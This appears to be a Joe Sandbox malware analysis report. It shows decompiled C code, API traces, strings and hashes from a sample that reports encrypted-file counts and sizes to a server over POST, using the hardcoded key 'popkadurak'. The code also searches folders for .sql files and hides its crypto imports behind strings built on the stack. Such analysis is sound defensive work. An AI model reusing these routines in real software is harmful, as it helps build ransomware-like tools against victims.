GetLastError.KERNEL32(?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7466
RegCloseKey.ADVAPI32(?,?,0FBB7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB746F

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: ef994be54dd724921188d27d58642441ef7d4b7ff11691cf3c4d922a8341cead
Instruction ID: 7f1b9227ae579d956ba529107f69cf3700b59d887f690656698de17afb6a5b0e
Opcode Fuzzy Hash: ef994be54dd724921188d27d58642441ef7d4b7ff11691cf3c4d922a8341cead
Instruction Fuzzy Hash: 7D011E32A0011DAFCB109F95ED05DEA7B6CEB08762F504166FD05D6111D7729A25AFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0FBB6550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0FBB63E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0fbb6553
0x0fbb6554
0x0fbb6565
0x0fbb656e
0x0fbb657f
0x0fbb6588
0x0fbb658d
0x0fbb6597
0x0fbb65b5
0x0fbb65b9
0x0fbb65c3
0x0fbb65c8
0x0fbb65c8
0x0fbb65d2
0x0fbb65df

APIs

VirtualAlloc.KERNELBASE(00000000,00000123,00003000,00000004,?,?,0FBB4B9E), ref: 0FBB6565
VirtualAlloc.KERNELBASE(00000000,00000515,00003000,00000004,?,0FBB4B9E), ref: 0FBB657F

Part of subcall function 0FBB63E0: CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FBB4B96,?,0FBB4B9E), ref: 0FBB63F8
Part of subcall function 0FBB63E0: GetLastError.KERNEL32(?,0FBB4B9E), ref: 0FBB6402
Part of subcall function 0FBB63E0: CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB4B9E), ref: 0FBB641E

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: e91686029e539185a4aa758dc935f2ed0069d03a9ac49567e6e540452e3d99f5
Instruction ID: 8b794522abf91f28aba5680e05ae7bd53be6588aab0b91d449965502e767cfb7
Opcode Fuzzy Hash: e91686029e539185a4aa758dc935f2ed0069d03a9ac49567e6e540452e3d99f5
Instruction Fuzzy Hash: 7D11B774A40208EBD704CF88DA55F99B7F9EB88705F208188E908AB381D7B5AF119F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FBB53D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0FBB53D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0FBB5F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0FBB33E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0FBB5350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0FBB7E40( &_v104);
						_v92 = E0FBB5220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xfbbfb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xfbbfb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xfbbfb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xfbbfb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xfbbfb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xfbbfb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0FBB8050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0FBB53D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xfbc2a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xfbc2a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB53DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB53F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FBB541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB5477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB5481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB5492
HeapFree.KERNEL32(00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB54AD
HeapFree.KERNEL32(00000000,?,?,?,?,0FBB5615,00000000,popkadurak), ref: 0FBB54BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB54CD
GetLastError.KERNEL32(?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB54DC
lstrlenA.KERNEL32(00000000,00000000,00000000,74CB6980), ref: 0FBB5512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB5532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FBB5544
lstrcatA.KERNEL32(00000000,?), ref: 0FBB555E
lstrlenA.KERNEL32(00000000), ref: 0FBB55B3
lstrlenW.KERNEL32(?), ref: 0FBB55BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FBB55DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB5643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB564D
InternetCloseHandle.WININET(0FBB581B), ref: 0FBB5657

Strings

POST, xrefs: 0FBB55CA
popkadurak, xrefs: 0FBB55E9

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: faf53cf984648f2bbadf8bb6bf4bd450ba4cf35cda916c10a158ce7ec6b341a1
Instruction ID: 1d2d8b0d43d54c558be9dbf902c9da68c8f6496aa745b6464ae1649cc8164336
Opcode Fuzzy Hash: faf53cf984648f2bbadf8bb6bf4bd450ba4cf35cda916c10a158ce7ec6b341a1
Instruction Fuzzy Hash: 0071B271E00309AADB209BAAEC45BFEBB7CEB89712F144159EA05B3141DBB89541CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FBB5670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0FBB3BC0( &_v164);
				E0FBB7490( &_v164, _t82);
				E0FBB72A0( &_v164);
				E0FBB70A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xfbc2a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xfbc2a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0FBB5F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0FBB54F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0FBB7D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FBB5696
wsprintfW.USER32 ref: 0FBB56BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBB5708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FBB571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB5739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0FBB574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0FBB5757
wsprintfA.USER32 ref: 0FBB576D
CryptBinaryToStringA.CRYPT32(00000000,74CB66A0,40000001,00000000,?), ref: 0FBB579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0FBB57A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB57B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0FBB57C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB57CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB57EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0FBB5804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB5854

Strings

popkadurak, xrefs: 0FBB5746, 0FBB5762
action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FBB56B9

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: bb24ba9074866afe7bb774c571a93aa5fb4d43ec12f87dc3cee9b64a2942a1d5
Instruction ID: 12b88e516196d2b1c18c8764d5ccfdf02d856fcc949e5253e22cdc7a4feafe4f
Opcode Fuzzy Hash: bb24ba9074866afe7bb774c571a93aa5fb4d43ec12f87dc3cee9b64a2942a1d5
Instruction Fuzzy Hash: 78518274A40308BFEB249B65EC86FEE7B6CEB45701F540098FA05A7181DAF4AA11CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB6BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0FBB8260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0FBB6B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6BB2
lstrcatW.KERNEL32(00000000,0FBBFF44), ref: 0FBB6BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6BD2
lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6BFC
lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6C12
lstrcatW.KERNEL32(00000000,?), ref: 0FBB6C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0FBB6C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBB6C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBB6C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBB6C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBB6C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBB6CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0FBB6CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBB6CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBB6CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0FBB6D1C
FindClose.KERNEL32(?,?,?), ref: 0FBB6D2D

Strings

*******************, xrefs: 0FBB6CB9, 0FBB6CC9
.sql, xrefs: 0FBB6C54

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: e1a1c498bde115124241d1f905a8c8b844503e7e1923b4e09b2d9b7d9f40edc2
Instruction ID: 29cae4d1eae6944ee6fb77546c8a4b04e3289a8b1c81608c132d23b083c46882
Opcode Fuzzy Hash: e1a1c498bde115124241d1f905a8c8b844503e7e1923b4e09b2d9b7d9f40edc2
Instruction Fuzzy Hash: 91417171A01219ABDB209B65AC89FFE77BDEF05711F4040E9F901E3141DBF8AA168F60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB8400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0FBB8400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB8420
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBB8448
GetModuleHandleA.KERNEL32(?), ref: 0FBB849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB84AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB84BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB84DE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB84EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB8500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB850E

Strings

Advapi32.dll, xrefs: 0FBB84A7, 0FBB84AA
CryptGenRandomAdvapi32.dll, xrefs: 0FBB84B5, 0FBB84B8

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 94c2bcdb252b355de2f304e1b4fed482be16934230c65f3f27cc097bd5585056
Instruction ID: dd4cef6e4cd47fcea320fda418f32fdf81f1995130b655b07fda6dc56239aaef
Opcode Fuzzy Hash: 94c2bcdb252b355de2f304e1b4fed482be16934230c65f3f27cc097bd5585056
Instruction Fuzzy Hash: 3E317471E00209AFDB108FA69C45BEEBB7DEB45711F504059FA05F6140D7B89A128F65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FBB6660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfbc2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
